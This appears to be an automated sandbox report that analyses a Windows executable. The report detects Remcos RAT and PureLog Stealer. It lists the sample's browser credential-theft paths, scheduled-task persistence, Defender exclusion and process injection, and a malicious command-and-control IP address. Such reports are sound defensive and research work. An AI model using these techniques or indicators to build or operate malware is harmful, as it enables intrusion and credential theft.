                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040A0B0 GetLocalTime,wsprintfW,18_2_0040A0B0
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004195F8 GetUserNameW,18_2_004195F8
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004468DC _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,18_2_004468DC
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.7410000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.7410000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.3d6e790.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.3d6e790.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1831199918.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PEbZthAqV9.exe PID: 7952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data18_2_0040A953
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\18_2_0040AA71
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: \key3.db18_2_0040AA71

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-Y7J88PJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-Y7J88P
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.7410000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.7410000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.3d6e790.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.3d6e790.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1831199918.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PEbZthAqV9.exe PID: 7952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: cmd.exe18_2_0040567A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services12
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		11
                  Deobfuscate/Decode Files or Information                  		111
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol111
                  Input Capture                  		2
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		1
                  Windows Service                  		4
                  Obfuscated Files or Information                  		2
                  Credentials In Files                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook122
                  Process Injection                  		22
                  Software Packing                  		NTDS3
                  File and Directory Discovery                  		Distributed Component Object ModelInput Capture1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Scheduled Task/Job                  		1
                  Timestomp                  		LSA Secrets33
                  System Information Discovery                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials121
                  Security Software Discovery                  		VNCGUI Input Capture12
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync31
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron122
                  Process Injection                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570841 Sample: PEbZthAqV9.exe Startdate: 08/12/2024 Architecture: WINDOWS Score: 100 50 geoplugin.net 2->50 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 12 other signatures 2->62 8 PEbZthAqV9.exe 7 2->8         started        12 myTuDsvNcebev.exe 5 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\...\myTuDsvNcebev.exe, PE32 8->42 dropped 44 C:\...\myTuDsvNcebev.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp53D2.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\PEbZthAqV9.exe.log, ASCII 8->48 dropped 64 Uses schtasks.exe or at.exe to add and modify task schedules 8->64 66 Adds a directory exclusion to Windows Defender 8->66 68 Injects a PE file into a foreign processes 8->68 14 PEbZthAqV9.exe 2 13 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        70 Multi AV Scanner detection for dropped file 12->70 72 Contains functionalty to change the wallpaper 12->72 74 Machine Learning detection for dropped file 12->74 76 4 other signatures 12->76 24 myTuDsvNcebev.exe 12->24         started        26 schtasks.exe 12->26         started        28 myTuDsvNcebev.exe 12->28         started        30 3 other processes 12->30 signatures6 process7 dnsIp8 52 41.216.183.238, 49737, 7112 AS40676US South Africa 14->52 54 geoplugin.net 178.237.33.50, 49738, 80 ATOM86-ASATOM86NL Netherlands 14->54 78 Detected Remcos RAT 14->78 80 Loading BitLocker PowerShell Module 18->80 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        36 conhost.exe 20->36         started        38 conhost.exe 22->38         started        40 conhost.exe 26->40         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PEbZthAqV9.exe63%ReversingLabsByteCode-MSIL.Trojan.PureLogStealer
                  PEbZthAqV9.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe63%ReversingLabsByteCode-MSIL.Trojan.PureLogStealer

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.ascendercorp.com/typedesigners.htmls0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  geoplugin.net
                  		178.237.33.50
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bThePEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers?PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/DataSet1.xsdPEbZthAqV9.exe, myTuDsvNcebev.exe.0.drfalse
                                    		high
                                    http://www.tiro.comPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designersPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://geoplugin.net/json.gpsystem32PEbZthAqV9.exe, 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.goodfont.co.krPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0PEbZthAqV9.exe, myTuDsvNcebev.exe.0.drfalse
                                              		high
                                              http://www.carterandcone.comlPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sajatypeworks.comPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.typography.netDPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/cabarga.htmlNPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/cThePEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.galapagosdesign.com/staff/dennis.htmPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cnPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designers/frere-user.htmlPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://geoplugin.net/json.gpi5HPEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://geoplugin.net/json.gp/CPEbZthAqV9.exe, 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, myTuDsvNcebev.exe, 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.ascendercorp.com/typedesigners.htmlsPEbZthAqV9.exe, 00000000.00000002.1833712267.0000000005580000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.galapagosdesign.com/DPleasePEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers8PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.fonts.comPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.sandoll.co.krPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.urwpp.deDPleasePEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.zhongyicts.com.cnPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePEbZthAqV9.exe, 00000000.00000002.1830115364.0000000002D98000.00000004.00000800.00020000.00000000.sdmp, myTuDsvNcebev.exe, 00000009.00000002.1931870695.0000000002BA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sakkal.comPEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    178.237.33.50
                                                                                    		geoplugin.netNetherlands
                                                                                    		8455ATOM86-ASATOM86NLfalse
                                                                                    41.216.183.238
                                                                                    		unknownSouth Africa
                                                                                    		40676AS40676UStrue

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1570841
                                                                                    Start date and time:2024-12-08 09:03:06 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 56s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:22
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:PEbZthAqV9.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:10ab4b6fb83aea3840ac04855974f62d.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.rans.troj.spyw.evad.winEXE@27/16@1/2
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 99%
                                                                                    • Number of executed functions: 138
                                                                                    • Number of non-executed functions: 196
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target PEbZthAqV9.exe, PID 7952 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • VT rate limit hit for: PEbZthAqV9.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    03:04:03API Interceptor4293247x Sleep call for process: PEbZthAqV9.exe modified
                                                                                    03:04:10API Interceptor81x Sleep call for process: powershell.exe modified
                                                                                    03:04:14API Interceptor1x Sleep call for process: myTuDsvNcebev.exe modified
                                                                                    08:04:12Task SchedulerRun new task: myTuDsvNcebev path: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    178.237.33.50IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                                                                    • geoplugin.net/json.gp
                                                                                    LdSbZG1iH6.exeGet hashmaliciousRemcos, PureLog StealerBrowse
